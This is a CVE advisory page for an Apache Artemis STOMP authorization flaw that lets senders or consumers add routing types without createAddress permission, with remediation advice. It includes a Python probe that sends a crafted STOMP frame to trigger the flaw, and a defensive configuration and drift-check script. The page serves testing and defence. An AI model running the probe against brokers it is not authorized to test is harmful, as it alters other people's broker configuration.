Description
A vulnerability exists in Apache Artemis whereby an application using the STOMP protocol with security credentials that grant either the consume or send permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. A user could successfully send a message to an address or consume a message from a queue with a routing-type not supported by the corresponding address when that operation should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. Even though the user was already granted permission to send and/or consume messages, they should not be able to augment the routing-type of the address without the createAddress permission.

This issue affects Apache Artemis: from 2.50.0 through 2.53.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0.

Users are recommended to upgrade to version 2.54.0, which fixes the issue.
Published: 2026-05-28
Score: 4.3 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Changing the routing types an address supports is an address-configuration operation that Artemis reserves to holders of the createAddress permission. In the affected versions, the STOMP protocol layer did not enforce that rule: a user holding only send or consume permission on an address could send to it, or consume from a queue on it, using a routing type the address does not support, and the broker added that routing type to the address instead of rejecting the frame. The weakness is an incorrect authorization check (CWE-863): a principal authorized only to exchange messages is able to alter broker configuration that should be immutable to it.

Affected Systems

The CVE lists two affected products with separate version ranges: Apache Artemis 2.50.0 through 2.53.0 and Apache ActiveMQ Artemis 2.0.0 through 2.44.0. Any deployment in those ranges that exposes a STOMP acceptor and grants send or consume permission on an address to STOMP principals is affected; brokers that accept no STOMP connections are not reachable through this flaw, since the missing check is specific to the STOMP protocol handling.

Risk and Exploitability

The CVSS 3.1 base score is 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N): reachable over the network with low attack complexity, requires valid low-privilege credentials and no user interaction, and is scored as a low integrity impact only, with no confidentiality or availability impact. No public exploit is reported and the CVE is not in the CISA KEV catalog. The precondition is modest: a STOMP session authenticated as a user with send or consume permission on the target address, which in many deployments describes every application client, so the exposed population is broad. The consequence is bounded to adding a routing type to an address the user may already use, but that is a change to broker configuration the authorization model meant to reserve to createAddress holders, and the only fix is the version upgrade.

Generated by OpenCVE AI on May 29, 2026 at 13:28 UTC.
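The check described in the description (a SEND with a routing type the address does not support, from a user without createAddress) can be scripted. The following probe is an added example, not code from the page or from the Artemis project. It assumes that Artemis reads the routing type of a STOMP SEND from a `destination-type` header with values ANYCAST or MULTICAST, and that a rejected SEND carrying a `receipt` header is answered with an ERROR frame while an accepted one gets a RECEIPT; confirm both against your broker's STOMP documentation. Target an address configured with the other routing type and a user that holds send but not createAddress on it; a RECEIPT for an address that already supports the requested type proves nothing.

```python
"""Probe for CVE-2026-40914: does a STOMP user with only send permission get
its SEND accepted when the frame names a routing type the address does not
support? Stand-alone, stdlib only. The frame builder/parser and the verdict
logic are usable offline; the network probe runs only when invoked."""
import socket

# Assumed Artemis STOMP header carrying the routing type of a SEND/SUBSCRIBE;
# values ANYCAST or MULTICAST. Check the STOMP chapter of your broker's docs.
ROUTING_TYPE_HEADER = "destination-type"


def build_frame(command, headers, body=b""):
    """Serialize a STOMP frame: command line, header lines, blank line, body, NUL."""
    lines = [command] + [f"{k}:{v}" for k, v in headers.items()]
    return ("\n".join(lines) + "\n\n").encode("utf-8") + body + b"\x00"


def parse_frame(raw):
    """Parse one frame (leading heartbeat newlines tolerated).
    Returns (command, headers, body); the first occurrence of a repeated header wins."""
    head, _, body = raw.lstrip(b"\n").partition(b"\n\n")
    lines = head.decode("utf-8").split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name not in headers:
            headers[name] = value
    return lines[0], headers, body.split(b"\x00", 1)[0]


def recv_frame(sock):
    """Read from the socket until a complete NUL-terminated frame has arrived."""
    buf = b""
    while b"\x00" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("broker closed the connection before a frame arrived")
        buf += chunk
    return buf


def verdict(response_command):
    """Interpret the broker's reply to a SEND that carried a receipt header."""
    if response_command == "RECEIPT":
        return "ACCEPTED"   # the routing type was added: the CVE behaviour, if the address lacked it
    if response_command == "ERROR":
        return "REJECTED"   # expected on fixed versions (2.54.0 per the advisory)
    return "UNEXPECTED"


def probe_send(host, port, login, passcode, address, routing_type, timeout=5.0):
    """Authenticate, SEND one message with a receipt and the given routing type,
    and return (verdict, broker message). WARNING: on a vulnerable broker this
    probe itself adds the routing type to the address; run it against a test broker."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_frame("CONNECT", {
            "accept-version": "1.2", "host": host,
            "login": login, "passcode": passcode}))
        command, headers, body = parse_frame(recv_frame(sock))
        if command != "CONNECTED":
            raise RuntimeError(f"CONNECT failed: {command} {headers.get('message', '')}")
        sock.sendall(build_frame("SEND", {
            "destination": address, ROUTING_TYPE_HEADER: routing_type,
            "receipt": "cve-2026-40914-probe", "content-type": "text/plain"},
            b"routing-type probe"))
        command, headers, body = parse_frame(recv_frame(sock))
        try:
            sock.sendall(build_frame("DISCONNECT", {}))
        except OSError:
            pass  # the broker may already have closed the connection after an ERROR
        return verdict(command), headers.get("message", body.decode("utf-8", "replace"))


if __name__ == "__main__":
    import sys
    host, port, login, passcode, address, routing_type = sys.argv[1:7]
    print(probe_send(host, int(port), login, passcode, address, routing_type))
```

Usage: `python probe.py broker.example 61613 stomp-app secret orders.created MULTICAST` against an address declared ANYCAST; ACCEPTED before the upgrade and REJECTED after is the expected pair. Because a successful probe mutates the address, run it on a disposable broker and check the address's routing types afterwards.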

Remediation

The vendor fix is the upgrade to version 2.54.0 named in the description; the advisory describes no workaround.

OpenCVE Recommended Actions

  • Upgrade to Apache Artemis 2.54.0 or later, the release the advisory names as containing the fix. No separate fixed release is named for the Apache ActiveMQ Artemis 2.0.0 through 2.44.0 range, so treat 2.54.0 as the target there as well.
  • Until the upgrade is done, treat every STOMP principal with send or consume permission as able to add routing types to the addresses it may use. Keep those grants scoped to the addresses each application actually needs (narrow security-setting match patterns), and keep createAddress, deleteAddress and the queue-creation permissions with an administrative role.
  • Audit security-settings so that createAddress is held only by roles that are meant to change address configuration, and declare the routing type of every application address explicitly in broker.xml so that drift from the intended configuration is detectable.
  • Compare the live routing types of addresses (the RoutingTypes attribute of each address's management MBean, or the console's address view) against broker.xml and alert when an address has acquired a routing type it was not configured with; where STOMP frames are logged, flag SEND and SUBSCRIBE frames whose requested routing type disagrees with the address's declared one.
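The second, third and fourth actions above can be combined into one check. The script below is an added example, not code from the page or from the Artemis project. Its broker.xml fragment is constructed for the example and shows the least-privilege layout the actions describe (STOMP roles get send/consume on a narrow match, createAddress stays with an admin role, routing types declared explicitly); it lists which roles can exchange messages without holding createAddress, exactly the principals the CVE concerns before the upgrade, and compares the declared routing types with a set of observed ones. The observed set is a constructed sample standing in for a read of the RoutingTypes attribute of each address's management MBean; fetching that from a live broker is left to the operator's tooling.

```python
"""Least-privilege security-settings for STOMP principals and a routing-type
drift check related to CVE-2026-40914. Stand-alone; stdlib only."""
import xml.etree.ElementTree as ET

NS = "{urn:activemq:core}"

# Constructed broker.xml fragment for this example (no real deployment).
# STOMP roles get send/consume on a narrow match; createAddress and the other
# configuration permissions stay with an admin role. Routing types are declared
# explicitly so that drift can be detected.
BROKER_XML = """<configuration xmlns="urn:activemq">
  <core xmlns="urn:activemq:core">
    <security-settings>
      <security-setting match="orders.#">
        <permission type="send" roles="stomp-producers"/>
        <permission type="consume" roles="stomp-consumers"/>
        <permission type="createNonDurableQueue" roles="stomp-consumers"/>
        <permission type="deleteNonDurableQueue" roles="stomp-consumers"/>
        <permission type="createAddress" roles="admins"/>
        <permission type="deleteAddress" roles="admins"/>
        <permission type="createDurableQueue" roles="admins"/>
        <permission type="deleteDurableQueue" roles="admins"/>
        <permission type="manage" roles="admins"/>
      </security-setting>
    </security-settings>
    <addresses>
      <address name="orders.created">
        <anycast><queue name="orders.created"/></anycast>
      </address>
      <address name="orders.events">
        <multicast/>
      </address>
    </addresses>
  </core>
</configuration>"""


def configured_routing_types(xml_text):
    """Routing types declared per address in broker.xml."""
    root = ET.fromstring(xml_text)
    result = {}
    for addr in root.iter(NS + "address"):
        types = set()
        if addr.find(NS + "anycast") is not None:
            types.add("ANYCAST")
        if addr.find(NS + "multicast") is not None:
            types.add("MULTICAST")
        result[addr.get("name")] = types
    return result


def messaging_roles_without_create_address(xml_text):
    """Per security-setting match: roles holding send or consume but not
    createAddress. Before the upgrade these are the principals the CVE lets
    add a routing type; afterwards they are what createAddress must exclude."""
    root = ET.fromstring(xml_text)
    result = {}
    for setting in root.iter(NS + "security-setting"):
        roles_by_type = {}
        for perm in setting.findall(NS + "permission"):
            roles = {r.strip() for r in perm.get("roles", "").split(",") if r.strip()}
            roles_by_type.setdefault(perm.get("type"), set()).update(roles)
        messaging = roles_by_type.get("send", set()) | roles_by_type.get("consume", set())
        result[setting.get("match")] = messaging - roles_by_type.get("createAddress", set())
    return result


def routing_type_drift(configured, observed):
    """Addresses whose live routing types include one not declared in broker.xml.
    `observed` maps address name -> set of routing types read from the broker."""
    drift = {}
    for name, declared in configured.items():
        extra = observed.get(name, set()) - declared
        if extra:
            drift[name] = extra
    return drift


# Constructed sample of live routing types (stand-in for the RoutingTypes
# management attribute): orders.created has gained MULTICAST, never declared.
OBSERVED_SAMPLE = {
    "orders.created": {"ANYCAST", "MULTICAST"},
    "orders.events": {"MULTICAST"},
}


def check_sample():
    """Run the drift check on the constructed data; returns the drift map."""
    return routing_type_drift(configured_routing_types(BROKER_XML), OBSERVED_SAMPLE)


if __name__ == "__main__":
    print("send/consume roles without createAddress:",
          messaging_roles_without_create_address(BROKER_XML))
    print("routing-type drift:", check_sample())
```

Run on a schedule with `observed` filled from the broker, a non-empty drift map is the signal the fourth action asks for; an empty map after the upgrade, with the roles listed by the second function still lacking createAddress, is the expected steady state.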



Advisories

No advisories yet.

History

Fri, 29 May 2026 16:00:00 +0000

  First Time appeared (values added): Apache activemq Artemis Stomp Protocol; Apache artemis Stomp Protocol
  Vendors & Products (values added): Apache activemq Artemis Stomp Protocol; Apache artemis Stomp Protocol

Fri, 29 May 2026 12:30:00 +0000

  First Time appeared (values added): Apache; Apache activemq Artemis; Apache artemis
  CPEs (values added): cpe:2.3:a:apache:activemq_artemis:*:*:*:*:*:*:*:*; cpe:2.3:a:apache:artemis:*:*:*:*:*:*:*:*
  Vendors & Products (values added): Apache; Apache activemq Artemis; Apache artemis
  Metrics (values added): cvssV3_1 {'score': 4.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}

Thu, 28 May 2026 14:30:00 +0000

  References (values added): none shown

Thu, 28 May 2026 12:45:00 +0000

  Description (values added): A vulnerability exists in Apache Artemis whereby an application using the STOMP protocol with security credentials that grant either the consume or send permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. A user could successfully send a message to an address or consume a message from a queue with a routing-type not supported by the corresponding address when that operation should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. Even though the user was already granted permission to send and/or consume messages, they should not be able to augment the routing-type of the address without the createAddress permission. This issue affects Apache Artemis: from 2.50.0 through 2.53.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0. Users are recommended to upgrade to version 2.54.0, which fixes the issue.
  Title (values added): Apache Artemis Stomp Protocol, Apache ActiveMQ Artemis Stomp Protocol: Address routing-type can be updated by STOMP protocol user without the createAddress permission
  Weaknesses (values added): CWE-863
  References (values added): none shown

MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-05-28T13:15:25.457Z

Reserved: 2026-04-15T17:18:02.939Z

Link: CVE-2026-40914

Vulnrichment

No data.

NVD

Status : Analyzed

Published: 2026-05-28T13:16:23.013

Modified: 2026-05-29T12:25:08.967

Link: CVE-2026-40914

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-29T15:48:33Z

Weaknesses